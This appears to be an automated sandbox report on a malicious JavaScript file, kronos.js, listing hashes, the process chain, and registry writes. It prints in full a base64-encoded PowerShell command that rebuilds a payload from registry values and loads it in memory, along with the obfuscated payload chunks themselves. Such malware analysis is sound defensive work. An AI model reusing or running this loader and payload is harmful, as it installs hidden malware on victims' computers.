File name: | kronos.js |
Full analysis: | https://app.any.run/tasks/408db7df-2c3d-466e-b745-f704a1b2daa3 |
Verdict: | Malicious activity |
Analysis date: | January 08, 2021, 17:34:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | BD52C3FCB98700992066743B021876DD |
SHA1: | C711676CF2DADFFA73B3BD03DE01FC3E6EA4E892 |
SHA256: | A0081F88E43338810FE23BD2E1FBA8857B45F4378DF38FC0C217426468B924FC |
SSDEEP: | 768:d7CMeEg04yt6FXjegX0Z62vdg+wYR9zECQsIuh3+7Ele3UfZ0l0jLqx15FUaHMyh:dxztA1GVMA5l0PrF06 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2220 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\kronos.js" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2660 | "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= " | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3544 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= " | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | (default) |
Value: | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 0 |
Value: yduasqvtqqvyqqffffqvbpqqqqvvyqqqqqqqqqqqqqqqqqqqqqqqvvpqqvvewfbavevvbyvscdrwbpvwyccdrwuyipisotrvovorifiooriwidrvitiwieieifoyrviriurvorouiervisiervyyyfutrvidifiyiurevdvdvaryqqqqvvuvyuqvycvwvtvvriiefoufqqqqqveqvrrwvbvwvbqvaewyqvviqqqqeecdwyqvrqqvevwyqqvvwqrqqvvrqvvyqqqqqyqqqqqvrvwuqvvrqqqqvtvvyvpuqvwqvvwqqqwqvvwqqqqvwqqqqqqqvvspcdwyvvutqqvvevwyvvapvrqqqqqqqqqqqqqvwuqcqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvrqqpqqqqqqqvvprqvvypqqqqqqqvreoyiuopoyqqfyadwyqvrqqvaewyqvvrqqqqqqqqqvrqvvivreorotoritqqapvrqqevwyqvvyqqbvwyqqqqqqqqvvyqvvyvreoriuicifitqvvcqqqvwuqvvrqqbywyqqqqqqqqvvyqvvyrqqqqqqqqqqvvdvcdwyqqqvypqqvrquvvtyriqviyaowyqtqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqvvwevrrpvuqvvarawttvvrqbqqvwqvwwvrwpudwifevwvarbqiravvwttvvtvvwsqqvrqvwwvrobwsqvvyvtwpifvoqvvawfwvrpvpqvvavarbqiraqqwttvvtvvueqqvtqvwwottrqvvivavivrodwsqvvyvvwiviobwsqvvyifvsqvvarpvaqvvaoevwqvvyrdwtwyfevivyqvviotvbqvvapvvwqvvyrbvvoevwqvvyrpvwqvrbvifevittqvviotvdqvvarpvrqvrbrpvtqvrbvbrbqoraqvwttvvtvvibqqvyqvwwvvwivartqqqqqvvbrbriqiwoupvaviicrpwqqavbvortqqqvyvpfyvfevwwifevwwtvuwwvurdvtvvrbvivvwowtvurbduorvwqvovvcvporpcpewyovwrvwrpwwqvvaifwrqvvarpvwqvvivdvsrpvpqvvivvorsvpewyovwtvyrbvvwwvyrawevrrpvuqvvaravvwttvvrvvrpqqvuqvwwqfvvrpvuqvvivfvwrpviqvvidvvtqvwbrpwyqvvarpwuqvvaauvtqvwbvarbqirawbtvvbvvoavtqvviqvwwvvwivatpiyvtqqwivbwrvrfewuvfqvvrwrvtfewuveqvvrwrvrdvvfqvvrrpwyqvvarpwiqvvarpwoqvvaodwqqyvvoevbqvvyorsapewyovorwppfwyovoewpqvvaoewpqvvawirvvyqvvpoewpqvvawywrvrwrvtifrfqvviwtwiwwwirdviotwsqvvaoavrwftcrpwaqvvawtvyvrwwvywftyuprpwaqvvawtvurvbtqqpdwcqvvwwtviwwviwirvvrqwvvserpwbqvvawafevwwifevwwtwiwwwirdrtvvoeviqvvywrvtobvdqvvywwviifwbqvviwtwiwwwirdviotwsqvvaoavvrbrwvvoevuqvvywrvtobvdqvvywwviifwoqvviwtwiwwwirdviotwsqvvaoavvwwviwfrssywtvowiwtvpoevsqvvywrvtobvcqvvywwvoweupwrvpwawrvwifroqvviwtwiwwwirdviotwsqvvaoawwvuwwvpfevwwifevwwtwiwwwirdrroevaqvvywrvtobvcqvvywwvpifrbqvviwifevwwtwiwwwirdviotwsqvvaoavrwwvywfuvuprpwaqvvawtvsvrwwvywfuyuprpwaqvvawtvawiwtvboevoqvvywrvtobvcqvvywwvuwwvsrqtqvvwfyvifwfqvviwtvcwwvcwifevwwifevwwtwiwwwirdviotwsqvvaoaoevpqvvywrvtobvcqvvywwvcvrwwvawrvwifrtqvviwtwiwwwirdviotwsqvvaoawwvyrvfpqqupwtvdvrwwvywcuprpwcqvvawtvewiwtvftppiqqqrwwvdwfvcuprpwaqvvawtwvvrwwvdwfwvuprpwaqvvawtwwvrwwvdwfwyuprpwaqvvawtwrwwwwwifevwwtwiwwwirdyuvvwwwwpdwdqvvwwtwtvrwwwrwwwtwiwwwtpeisrpwdqvvavvoevpqvvywrvtobvcqvvywwvcwwwvupwwwtwwwtpeiswrvwifrtqvviwtwiwwwirdviotwsqvvaoavvwwvdwfrpupwtvdvvwwvfwoupwtvfwwvfwwvefevywtwiwwwitaibffffffwwvcrpweqvvawtwyoevpqvvywrvtobvcqvvywwvoweupwwwywawrvwifrtqvviwtwiwwwirdviotwsqvvaoavrwwvywfrpuprpwaqvvawtwuwwvbwifevwwtwiwwwirdvywwvuwtvcwwviwfrcwwvcwwwuupserpwbqvvawafevwwifevwwtwiwwwirdrtvvoevyqvvywrvtobvdqvvywwviifwtqvviwtwiwwwirdviotwsqvvaoavvrbrwvvoevtqvvywrvtobvdqvvywwviifvfqvviwtwiwwwirdviotwsqvvaoavvoevrqvvywrvtobvdqvvyifvbqvviwufevwwifevwwtwiwwwirdviotwsqvvaoavvdewbrivvwrvtobveqvvyrpwfqvvarprqqaifrwqvvavvdevtvvrbwrqiwoupvaviwbfevywtwiwwwitapffcffffraqvywwcqqqqtiqqwtvtqvysvtqvwbqqvwqvvwvttvvrvvcsqqqqvvorwapfwyovorrcpfwyovrpvyqvrbpvvrqvvyorwapfwyovoryipfwyovrpvuqvrbpvvtqvvyorwapfwyovororpfwyovrpviqvrbpvvyqvvyorwapfwyovorsypfwyovrpvoqvrbpvvuqvvyorwapfwyovorcvpfwyovrpvpqvrbpvviqvvyorwapfwyovorerpfwyovrpvsqvrbpvvoqvvyorwapfwyovorvvsvwyovrpvaqvrbpvvpqvvyorwapfwyovorrisvwyovrpvbqvrbpvvsqvvyoryasvwyovoruisvwyovrpvcqvrbpvvaqvvyorwapfwyovorpvsvwyovrpvdqvrbpvvbqvvyraqqyrutyayrvwqwqqqvvcqqoityretvretttvtttwtsqqquvvicqqbpvaqvrtoeqvryvbqvwpvpqvrtutoyorisieiootqqvvtcwtqvavsvwyvvrtuuutvvdcatwyvvwqqvrtyouuysyyqqecatwyvvopvtqvrtyricifirqqqqqrqvvwuofuvrwcvsveqqfaruttvvwiqvvwqqrtqqwqqvwsqqttqqppqqrtqqviqqvtqqvwqqvrqqviqqvwqqvtqqvrqqvwqqvtqqveqqvwqqvdqqqvvaqwqqqvvivvufvwupvwvivviivwupvwvivvopvwupvwvivvswvrupvwvivvsevrupvwvivvivvtywvtvivvotvtywvtvivvdpvybcvyvivvfyvybcvyvivvrtvuvtvuvivvytvuvtvuvivvafvuupvwvivvddvuvtvuvivvfpvuupvwviqsviupvwvavvtbvirfvivivviwviyivivivvpaviupvwvivvsyviupvwvivvacviywvtvivvcpviupvwvivvcdviupvwvivvfwviywvtvivvfsviupvwvivvtvvoupvwvivvtcvoupvwvivvyivoupvwvivvubvoupvwvivvorvoupvwvivvoovoupvwvivvoevoupvwvevvaavosovovivvcdvoywvtvivvetvoywvtvivvfevoeevoqqqwqqqvvwqw | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 1 |
Value: qwvvwqwoqqvuqwqwvvprvwwqrtqqvuqrquqtvwqvriqqvsqcqaqtvwqvtbqqvsqcqeqtvwqvusqqvsqcvvwrqtvwqvorqqvsqcvvwiqtvwqvsqqvvsqcvvwaqtvwqvasqqvsqcvvweqtvwqvcqqvvsqcvvrrqtvwqvdbqqvsqcvvriqtvwqvfuqqvsqcvvraqtvwqvwrvwqvvsqcvvreqbvwwqrsvwqvvdqcvvtrqbvwwqtcvwqvvdvvwqtrqtvwwqiavuqvvuvvwsvvtrvvwwvvbivuuovwtwvvsfvwwpvvtwvvacvwwcvvtwvvcrvwrqtwvvdtvwryvvtwvvesvwrpvvtwvvfavwrcvvtwqsvrtqtwvvwcvrtyvvtwvvrevrtpvvtwvvytvrtcvvrivvcrvrrdvwrivvdvvrrdvwrivvddvrtvvwrwvveovrtvvwvivvfvvrtvvwrwvvfuvrttvwrwvvffvrttvwrwqovtttvwrwwvvdvttivwrwvvwrvtrdvwrwvvwcvtrdvwrwvvruvtrdvwrwvvrfvtrdvwvivvtpvtttvwsprqqqsivvprvwvaqwqyrwqqvvpivvsyvwwqvrvvobrwqqvvpiwpssvwwyqrvvuprqqqswvvsovuurvwvrqqqvpqswrvurvryqvtqqqvpqswrvufvryiqyvvpyrwqqvvswvvievrydqivvbprwqqvvsivvpvvruuqpvvucruqqvvswwpcivoievrvsqqqvvtvvpiwpssvwubqsqqqvvtvvcivwpavriwqbqqqvvtvvcivwacvriiqcqqqvvtvvcivwbpvrifqfqqqvvtvvpiwpssvwubvvwqqqqtvvcivwpavrouvvwrqqqvvtvvcivwacvrocvvwyqqqvvtvvcivwbpvrpovvwpqqqvvtvvpiwpssvwubvvwsqqqvvtvvcivwpavrouvvwbqqqvvtvvcivwacvrocvvwdqqqvvtvvcivwbpvrpovvrwqqqvvtvvpiwpssvwubvvrrqqqvvtvvcivwpavrouvvryqqqvvtvvcivwacvrocvvriqqqvvtvvcivwbpvrpovvraqqqvvtvvpiwpssvwubvvrbqqqvvtvvcivwpavrouvvrdqqqvvtvvcivwacvrocvvrfqqqvvtvvcivwbpvrpovvttqqqvvtvvpiwpssvwubvvtyqqqvvtvvcivwpavrpdvvtiqqqvvtvvcivwacvrsivvtbqqqvvtvvcivwbpvrifvvyrqqqvvtvvpiwpssvwubvvytqqqvvtvvcivwpavratvvyuqqqvvtvvcivwacvraevvyaqqqvvtvvcivwbpvrbdvvuwqqqvvtvvpiwpssvwubvvutqqqvvtvvcivwpavrcuvvuuqqqvvtvvcivwacvrdquaqqqvvtvvcivwbpvrdfvviwqqqvvtvvpiwpssvwubvviyqqqvvtvvcivwpavresvviiqqqvvtvvcivwacvrefvvipqqqvvtvvcivwbpvrifvvicqqqvvtvvpiwpssvwubvvidqqqvvtvvcivwpavrfsvvifqqqvvtvvcivwacvrvbvwosqqqvvtvvcivwbpvrrwvwpuvvuvrqqqpiwpssvwwyvvppvvovrqqqpivvodvuydvwppqqvwvvtpvtqvvwvvsuvuvvrvvwvvtcvtqvvwvvpwvtvvrvvrvvtcvtqvvwvvpavtqvvrvvpfvtqvvwvvsivtqvvwvvsevtqvvrvvpfvtqvvwvvauvtqvvwvvauvtqvvrvvacvtqvvtvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvbcvtqvvrvvctvtqvvwvvbcvtqvvrvvctvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvauvtqvvrvvcbvtqvvtvvdtvtqvvyvvdavtqvvuvvdfvtqvvwvvauvtqvvrvvcbvtqvvtvvdtvtqvvyvvdavtqvvuvvdfvtqvvivvacvtqvvovvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuqdvyqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuqdvyqvvivvacvtqvvovvsevtqvvwqdvyqvvrvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuvvwavyqvvwvveovtqvvrvvefvtqvvtvvfbvtqvvyqrvyqvvuvvwavyqvvivvacvtqvvovvsevtqvvwvvfbvtqvvrvvwavyqvvtvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvveovtqvvrvvefvtqvvwvveovtqvvrvvefvtqvvtvvacvtqvvyvvsevtqvvwvvbuvtqvvwvvsevtqvvrvvpfvtqvvwvvryvyqvvrvvtyvyqvvtvvyvvyqvvyvvurvyqvvuvvitvyqvvivvorvyqvvovvpvvyqvvpvvpcvyqvvsvvsdvyqvvavvasvyqvvwvvryvyqvvrvvtyvyqvvtvvyvvyqvvyvvurvyqvvuvvitvyqvvivvorvyqvvovvpvvyqvvpvvpcvyqvvsvvsdvyqvvavvasvyqvvbvvacvtqvvcvvsevtqvvwvvsdvyqvvrvvasvyqvvtvvbuvtqvvwvvsuvutwvvssvwtavwywvvssvwyrvwuwvvssvwypvwusvvssvwwyqsvvssvwwyvvisvvssvwwyvvowvvffvuipvwosvvwwviievwowvvwpviopvwpwvvifviocvwvcvvssvwubvvpwvvouvipdvwwyvvssvwubvvpwvvobviafvwpwvvprviccvwswvvpfvieyvwssvvsbviwqowvvayviesvwawvvssvwfsvwasvvdfvivwvrbsqrvovpvrbsvvrvvowuvrosvvrovowbvrcsvvtovordvwdwvvssvwwyvvdsvvutvorvvrcsvviwvorovrdsvviavorbvrfwvvpyvotrvrdsvvpevotdvrosvvutvoytvrvwvwbrvoypvrvwvwcwvowyqsvwssvwayvrwsvwssvwwyvvrwvvttvvufvwrovvwbvwufvwrevvrtvvbovrrevvwbvvaevrpqttvvufvwvtvrttvvufvwvovvyvvwvbvvyvvwrpvvabvrvpqivvdivrvwqqqvveqwqqqvvfvviyvwoyvwddvwefvwwvvryfvrbfvipivwapvwfevwyvvwvbvvurvrvwvvytvwvdvvufvrvwqypqqqqqqqqqqqiwvuqvvyqqqqqqqvvwvvyfvwqqqyqqqqqqqvvwvvrtviqqqyqqqqqqqvvwvvupvwqqqtqrqyqtquqtqiqtqoqtqpqtqsqtqaqtqbqtqcqtqdqtqeqtqfqtvvwqvrqqqvvfvvoivrwsvvayvwwdvvcovwwfvvdsvwvevvorvrvevvoovrvevvocvrvevvpwvrvevvpivrvevvpbvrvevvsvvrvevvsuvrvevvsavrvevvsfvrqqtcydifiyouiciutevvoyiuotoyufiyicicreiyicicvvyyisiwioieifotoyisitotvvuvyuvvyyiuiciuioiwoyiuuriuotouidiuuyiporiuiwiyvvyyiuiciu | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 2 |
Value: ioiwoyiuuoifootityutiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuutiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuuoifootityyoiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuyoiuoyuyiporiuiwiyytifieoyiuopoyvvyyiuiciuioiwoyiuuiisoroyouiwicywicicifityuopvvyyiuiciuioiwoyiuuoorisoyiuuvorifitiuototydiuidiforosvvyyiuiciuioiwoyiuuriuiwiyuvorifitiuototydiuidiforosvvyyiuiciuioiwoyiuuaoouuieidiwovuiisiuooyfiiutiuitoyisifievvyyiuiciuioiwoyiuytoriuiwoyiuuvorifitiuototywvvuvorifitiuototysieiiiforidiwoyisifievvutoyiworoyouovysieiiiforidiwoyisifievvidotitiforicisirvvutosotoyiuidvvyfiriaiuitoyvvydouicoyisitiwotoyyyiuiciuioiwoyiuvvuiiwicouiuuyosoviuvvutoyorisieiouyifyrosoyiuywororiwosvvuyisidiuvvreitoyiforvvuriuotouidiuuyiporiuiwiyvvuoifootityutiuoyuyiporiuiwiyytifieoyiuopoyvvutiuoyuyiporiuiwiyytifieoyiuopoyvvuoifootityyoiuoyuyiporiuiwiyytifieoyiuopoyvvyoiuoyuyiporiuiwiyytifieoyiuopoyvvuiisoroyouiwicywicicifityuopvvuoorisoyiuuvorifitiuototydiuidiforosvvuriuiwiyuvorifitiuototydiuidiforosvvuaoouuieidiwovuiisiuooyfiiutiuitoyisifievvytoriuiwoyiuuvorifitiuototywvvycifiwiyycisiroriworosywvvyoiuoyuvorifitywiyiyoriuototvvycifiwiyywovisvvytoriuiwoyiuywovisvvuyipyrybosoiyfiiiyvvysieoiifibiuvvysywotosieituriuotouicoyvvywotosieitytiwiciciriwitibvvyriuioisieysieoiifibiuvvyuieiyysieoiifibiuvvuvorifitiuototypiwieiyiciuvvuyiporiuiwiyypiwieiyiciuvvuvorifitiuototysiyvvuyiporiuiwiyysiyvvutisoaiuvvuriuotiuoroiiuiytwvvyyiuotiboyifoquyisoyiciuvvydisotitvvuriuotiuoroiiuiytrvvutoyiyysieovouoyvvutoyiyyfouoyovouoyvvutoyiyyuororiforvvipiuopvvyeiwidiuvvutosotoyiuidreurouieoyisidiureysieoyiuorifovutiuoroiisitiuotvvydiworotipiwicywotywoyoyorisirouoyiuvvuuieidiwieiwioiuiyuyosoviuvvipuvorifitiuototvvieiwidiuvvidiuoyipifiyvvoviwosicifiwiyvvifiriaiuitoyvvipiwieiyiciuvvitiwiciciriwitibvvoriuotouicoyvvoyiporiuiwiyvvitifieoyiuopoyvviwiyiyoriuototvviciuieiooyipvvoyosoviuvvovorifoyiuitoyvvovorifitiuototvviriwotiuywiyiyoriuototvvirouiiiiiuorvvirouiiiiiuorutisoaiuvvirosoyiuotuoorisoyoyiuievvirosoyiuoturiuiwiyvviwovovicisitiwoyisifieyeiwidiuvvitifididiwieiyycisieiuvvovorifitiuototywoyoyorisirouoyiuotvvoyiporiuiwiyywoyoyorisirouoyiuotvvisieipiuorisoyypiwieiyiciuotvvitoriuiwoyisifieyiiciwiootvviuieoiisorifieidiuieoyvvitouororiuieoyyyisoriuitoyiforosvvotoyiworoyouovysieiiifvvovorifitiuototysieiiiforidiwoyisifievvutosotoyiuidreutiuitouorisoyosreuviuoridisototisifieotvvutiuitouorisoyosuviuoridisototisifieywoyoyorisirouoyiuvvutiuitouorisoyosywitoyisifievvutosotoyiuidreurouieoyisidiureytifidovisiciuorutiuoroiisitiuotvvytifidovisiciwoyisifieuriuiciwopiwoyisifieotywoyoyorisirouoyiuvvurouieoyisidiuytifidoviwoyisirisicisoyosywoyoyorisirouoyiuvvoyiuotoyufiyicicvvtcteitufufyyisotoviciwosyticiwototttvvtcutoyorisieiouyifyrosoyiuywororiwosteirufuftwvvopvvtcutoyorisieiouyifyrosoyiuywororiwosteirufuftqyiouieitivtrvvytutrytctetsufufytiwitipiuiyywieifieosidifouotydiuoyipifiyyyiuiciuioiwoyiutrvvytifidovisiciuoryoiuieiuoriwoyiuiyywoyoyorisirouoyiuvvutoyorisieiovvutouirotoyorisieiovvytifieoiiuoroyvvuyifyrosoyiuvvioiuoyufyciuieiooyipvvutosotoyiuidreytiforiuvvutosotoyiuidreycisieowvvyuieouidiuoriwiriciuvvutosotoyiuidreytificiciuitoyisifieotreyoiuieiuorisitvvysyuieouidiuoriwiriciuivtwvvuriwieioiuvvuoipiuoriuvvutiuiciuitoyvvuyifywororiwosvvydiwoyipvvutoworoyvvyyifouiriciuvvuyifutoyorisieiovvuriuoviciwitiuvvyyicicysidoviforoyywoyoyorisirouoyiuvvibiuorieiuictttrvvuyosoviuvvurouieoyisidiuuyosoviuypiwieiyiciuvvyoiuoyuyosoviuyiorifidypiwieiyiciuvvydiworotipiwicvvyyiuiciuioiwoyiuvvyoiuoyyyiuiciuioiwoyiuyiiforyiouieitoyisifieuvifisieoyiuorvvutisoaiuyfiivvuyifuuysieoytttrvvysieoyuvoyorvvuaiuorifvvyuopitiuovoyisifievvyrisoyytifieoiiuoroyiuorvvuyifysieoytttrvvysieoytttrvvioiuoyufutisoaiuvvuyifysieoytwtivvyrosoyiuvvyrouiiiiiuorvvywororiwosvvyricifitibytifovosvvyoiuoyyrosoyiuotvvutosotoyiuidreyyisiwioieifotoyisitotvvuvorifitiuototvvyoiuoyuvorifitiuototyrosysiyvvybisicicvvreititoyiforvvutoyorouitoyyciwosifouoyywoyoyorisirouoyiuvvyciwosifouoyybisieiyvvutosotoyiuidreutiuitouorisoyosvvuuieoiiuorisiiisiwiriciuytifiyiuywoyoy | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 3 |
Value: orisirouoyiuqvcvwypepotyvviyvvtuvviwvvtsvvtqtqtqtqttvvtqtqtqtqtqtqtqtyvvtqtqtqtqtqtqiivviivviivviivvtqtqtqtqirvvtpvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqiyvvtpvvtqtqtqtqtqtqtqiuvvtwvviivvirvviwvvtqiuvvtqtqirvvtyvvtqtsvvitvviyvvtrvvtwvvirvvtpvvtqtwvvtyvvitvvitvviyvvtrvvtwvvtuvvtyvvtivvtpvvtivvtsvvtovvttvvtrvvtqtovvtqtovvtrvvtivviivvtivvtovvtovvtrvvtivvtwvvtivviyvvtrvvtqtivvttvvtivvtwvvtivviuvvtivviuvvtivviivvtovvtyvvtrvvtqtivvtrvvtivvtuvvtrvvtqtovvtrvvtovvtuvvtivviuvvtrvvtqtivvtsvvtivviuvvtrvvtqtyvvtyvvtyvviivvtuvvttvvtrvvtqtivviyvvtivviivvtivvtyvvtivvtuvvtrvviuvvtqiyvvtqiyvvtqiwvvtrvvtyvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqiwvvtsvvtyvviivvtwvvtrvvtsvvttvviuvviyvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovvitvvitvvtqtsvviuvvtyvvitvvtovviyvvitvvtwvviuvviuvvtrvviuvvtovvitvvitvvtqiuvviyvvtrvviuvvtovviyvvitvvtqiuvvtuvvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtovvtsvvitvvtwvviuvvtivvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtpvvttvvitvvtqiuvvitvvtrvviuvvtovvitvvitvvtqtrvvtivvtyvviyvvtovviuvvitvvtwvviuvvitvvtrvviuvvtovvitvvitvvtqtuvvtrvvtivvtsvvtivvttvvtivvtpvviuvviyvvtrvviuvvtovvitvvitvvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtuvvtqtyvvtuvvtqtqtqtqtyvvitvvtqtwvvtqtuvvtqtqtpvvirvviuvvitvvitvviyvvtuvviivvtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqtqiuvvtqtqtqtqtrvvtqtwvvtqirvvtqtwvvtqiuvvtqirvvtqtqrtvvtqtqtqtqtwvviwvvtqtuvvtqtqtqtqtqtqtqtqtqtqtsvvt